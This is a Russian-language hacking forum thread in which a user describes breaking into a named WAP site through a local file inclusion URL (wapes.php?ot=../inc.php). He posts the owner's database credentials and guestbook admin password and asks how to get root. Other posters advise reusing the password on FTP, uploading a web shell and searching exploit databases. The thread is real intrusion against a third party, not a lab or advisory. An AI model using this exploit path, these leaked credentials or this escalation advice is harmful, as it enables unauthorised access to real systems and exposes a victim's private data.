Вопросик про userdb и root
 

Приветствую всех. Подскажите пожалуйста. Если есть пароли к БД, но не рутовские. Например:
$dbuser="kronas_forum";
$dbpass="1387";
$dbserver="localhost";
$dbname="kronas_forum";
можно ли взломать сайт или как-нибудь достать пароли от рута. Заранее спасибо.

Доступ к ftp есть?

На мой взгляд, если такой лоховской пароль - 1387, то он скорее всего должен подойти к фтп.
2 Muha Если прокатит, то лей туда какой-нить шелл, а дальше по стандартной теме... Вообщем пробуй...
Хотя чё я говорю-то, откуда он получил эти данные?!-значит шелл-то есть...
Если есть то смотри чё за система или сервисы и ищи сплоеты на милворме каком-нить...

Лоховский пароль он поставить тока на бд, т.к. это не серьезней фтп =)
Пароль узнать он мог нескольки способами:

- local include
- файл config.php.bak (к примеру)

::Сорри за флейм и оффтоп::
ну не согласен с тобой...
это ты меня ещё учить будешь?! :cool: :)
Хм, на счёт config.php.bak да и вообще, откуда он мог знать что такой файл есть на серве?
Значит шелл есть...

хы ))) такой лох врятли бы переименовывал в бак )))
апач нужно настраивать, чтобы отдавал тока определенные типы - если тип не определен - запись в лог :cool:

Muha учись задовать вопрос подробнее мы чесно не можем помоч зная только пароли и хост)) так что рассказывай))

гЫ..гЫ почему сразу лох?? может админы настроили))

Вообщем так. Захожу я как-то к себе в гостевую. Смотрю, кто-то рекламит свой сайт. А я это не очень люблю. Зашёл я в гости к рекламщику. И начал искать знаменитый чат якобы бодра. Это вап сайт http://kronex.vipzone.biz Нашёл я там чат. И начал искать файл syst/bib.php Файла не было. Попробовал syst/wapes.php Я обрадовался. Начал смотреть его пороль от БД к чату таким образом http://kronex.vipzone.biz/speak/chat/syst/wapes.php?ot=../inc.php Страница пустая, но посмотрев исходный код страницы мы видим пароль. Но после того, как я узнал его пароль от БД к чату, я расстроился, так как он был не рутовским
$MySQL_Hostname = "localhost";
$MySQL_Username = "kronas_chat";
$MySQL_Password = "1387";
$MySQLDatabasename = "kronas_chat";
Затем я зашёл в его чат и узнал путь, где лежит сайт /home/kronas/public_html/
Посмотрев на его сайт, я увидел, что у него много скриптов на БД. И начал смотреть пароли ко всем скриптам.
Вот что обнаружил:

$dbuser="kronas_forum";
$dbpass="1387";
$dbserver="localhost";
$dbname="kronas_forum";

$MySQL_Hostname = "localhost";
$MySQL_Username = "kronas_mafia";
$MySQL_Password = "1387";
$MySQLDatabasename = "kronas_mafia";

$user="kronas_tamago4i";
$parol="1387";
$database="kronas_mafia";
$host="localhost";
Имя админа в гостевой книге: Kronus Пароль: c1387z
Зашёл я под админом в гостевую написал ему чтобы он со мной связался по мылу, он так и не написал. Но не в этом суть. Вот меня интересует, что-нибудь можно сделать полезного с этими паролями.
Вот теперь нормально объяснил?
Спасибо, что сразу откликнулись. я встречаю первый форум, где помагают моментально

Кстати, к FTPшнику не подошли пароли :(